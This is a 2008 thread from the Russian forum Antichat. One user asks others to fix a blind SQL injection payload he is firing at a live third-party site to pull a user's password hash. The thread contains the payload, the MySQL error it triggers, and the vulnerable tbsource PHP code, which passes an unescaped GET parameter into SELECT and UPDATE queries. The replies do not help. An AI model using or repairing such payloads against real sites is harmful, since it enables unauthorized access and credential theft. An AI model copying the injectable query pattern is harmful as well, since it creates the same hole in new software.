Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   ошибка (https://forum.antichat.xyz/showthread.php?t=97639)

downloader 23.12.2008 21:25

не могу понять что за ошибка в sql syntax
 
здрасте я нашёл один сайт с sql inject`ом, я посмотрел в компе у меня есть тот же скрипт, но мне надо через тот sql inject надо сделати запрос, вот я сделал:

Код:

file.php?requestid=-1+or+id=if(ascii(substring((select+passhash+from+users+where+id=103949),=65,1))1,1,(select+1+union+select+2))+--+
но мне даёт error:
Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from users where id=103949),=65,1))1,1,( 1 2)) --' at line 1

понятно что в syntax но не магу найти где имена, скажите пожалуйста в чём я ошибся... :( вот скрипт:

Код:

$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or err();
 $arr = mysql_fetch_assoc($res);
if (($USER[id] == $arr[userid]) || (get_class() >= MODERATOR) || ($USER[id] == $arr[filledby]))
{
 @mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or err();
 print("Request $requestid successfully reset.");
}
else
 print("Sorry, cannot reset a request when you are not the owner");

скажите пожалуйста в чём я ошибся а то я ламаю голову весь день и не могу найти :(

downloader 23.12.2008 22:07

ребят ну помогите найти плз ошибку..

groundhog 23.12.2008 22:18

Дай урлу, а то ты написал чёрт знает что....

DVD_RW 23.12.2008 22:21

ппц это ж надо в болталке постить ...

downloader 23.12.2008 22:23

sorry.... не могу..

downloader 23.12.2008 23:01

можете обяснити плЗ?

downloader 24.12.2008 00:15

тиха... :(

Ponchik 24.12.2008 00:23

Хмм... Вывода кагбе нет :(
ТС, а подскажи чё это за скриптеги такие... Ну вот ты гриш у тя есть, делись :)

downloader 24.12.2008 00:30

это стандартный файл в tbsource (движок для тракера)

Ponchik 24.12.2008 00:33

Спасиба, памог, далбы плюсек да постов у тебя нет


Время: 18:19